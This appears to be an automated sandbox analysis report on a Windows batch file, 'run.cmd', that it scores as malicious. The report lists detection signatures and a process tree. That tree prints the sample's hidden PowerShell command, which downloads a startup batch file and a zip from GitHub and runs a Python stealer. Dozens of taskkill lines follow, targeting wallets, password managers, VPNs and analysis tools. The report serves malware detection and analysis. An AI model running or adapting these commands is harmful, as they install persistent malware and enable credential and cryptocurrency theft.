Edit tour
Windows
Analysis Report
run.cmd
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
AI detected suspicious sample
Excessive usage of taskkill to terminate processes
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: PowerShell DownloadFile
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious Program Location with Network Connections
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to download and execute files (via powershell)
Tries to harvest and steal browser information (history, passwords, etc)
Uses taskkill to terminate AV processes
Uses the Telegram API (likely for C&C communication)
AV process strings found (often used to terminate AV products)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Dropped file seen in connection with other malware
Drops PE files
Drops certificate files (DER)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious PowerShell Download - PoshModule
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- cmd.exe (PID: 8096 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\run.c md" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8172 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 1028 cmdline:
powershell .exe -Wind owStyle Hi dden -Comm and "[Net. ServicePoi ntManager] ::Security Protocol = [Net.Secu rityProtoc olType]::T ls12; (New -Object -T ypeName Sy stem.Net.W ebClient). DownloadFi le('https: //github.c om/ty9989/ u/raw/main /ud.bat', 'C:\Users\ user\AppDa ta\Roaming \\Microsof t\\Windows \\Start Me nu\\Progra ms\\Startu p\\Windows Secure.bat '); (New-O bject -Typ eName Syst em.Net.Web Client).Do wnloadFile ('https:// github.com /ty9989/z/ raw/main/T 3.zip', 'C :\\Users\\ Public\\Do cument.zip '); Add-Ty pe -Assemb lyName Sys tem.IO.Com pression.F ileSystem; [System.I O.Compress ion.ZipFil e]::Extrac tToDirecto ry('C:/Use rs/Public/ Document.z ip', 'C:/U sers/Publi c/Document '); Start- Sleep -Sec onds 1; C: \\Users\\P ublic\\Doc ument\\pyt hon.exe C: \Users\Pub lic\Docume nt\Lib\prt .py; Remov e-Item 'C: /Users/Pub lic/Docume nt.zip' -F orce" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 936 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - python.exe (PID: 4332 cmdline:
"C:\Users\ Public\Doc ument\pyth on.exe" C: \Users\Pub lic\Docume nt\Lib\prt .py MD5: A7F3026E4CF239F0A24A021751D17AE2) - taskkill.exe (PID: 3200 cmdline:
taskkill / F /IM Armo ryQt.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 3888 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 7276 cmdline:
taskkill / F /IM "Ato mic Wallet .exe" MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 7176 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 2180 cmdline:
taskkill / F /IM byte coin-gui.e xe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 2312 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 2952 cmdline:
taskkill / F /IM Coin omi.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 2972 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 6056 cmdline:
taskkill / F /IM Elem ent.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 4240 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 3996 cmdline:
taskkill / F /IM Exod us.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 4508 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 4140 cmdline:
taskkill / F /IM Guar da.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 4932 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 4920 cmdline:
taskkill / F /IM KeeP assXC.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 4772 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 5288 cmdline:
taskkill / F /IM Nord VPN.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 4832 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 3068 cmdline:
taskkill / F /IM Open VPNConnect .exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 420 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 5356 cmdline:
taskkill / F /IM seam onkey.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 2716 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 7760 cmdline:
taskkill / F /IM Sign al.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 7256 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 5320 cmdline:
taskkill / F /IM file zilla.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 5264 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 7496 cmdline:
taskkill / F /IM file zilla-serv er-gui.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 6156 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 6036 cmdline:
taskkill / F /IM keep assxc-prox y.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 4940 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 4484 cmdline:
taskkill / F /IM nord vpn-servic e.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 3192 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 7908 cmdline:
taskkill / F /IM stea m.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 7968 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 4316 cmdline:
taskkill / F /IM wall etd.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 1012 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 6688 cmdline:
taskkill / F /IM wate rfox.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 1452 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 5988 cmdline:
taskkill / F /IM Disc ord.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 6524 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 1120 cmdline:
taskkill / F /IM Disc ordCanary. exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 7104 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 4648 cmdline:
taskkill / F /IM burp .exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 6064 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 6148 cmdline:
taskkill / F /IM Ethe real.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 7928 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 4064 cmdline:
taskkill / F /IM Ethe rApe.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 7492 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 2892 cmdline:
taskkill / F /IM fidd ler.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 2828 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 6316 cmdline:
taskkill / F /IM HTTP DebuggerSv c.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 1480 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 2024 cmdline:
taskkill / F /IM HTTP DebuggerUI .exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 6180 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 6940 cmdline:
taskkill / F /IM snpa .exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 1008 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 1824 cmdline:
taskkill / F /IM sola rwinds.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 6956 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 1412 cmdline:
taskkill / F /IM tcpd ump.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 6088 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 6444 cmdline:
taskkill / F /IM tele rik.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 6944 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 5500 cmdline:
taskkill / F /IM wire shark.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 2848 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 7264 cmdline:
taskkill / F /IM winp cap.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 7308 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 7412 cmdline:
taskkill / F /IM tele gram.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 7392 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems), Tim Shelton: |
Source: | Author: Florian Roth (Nextron Systems): |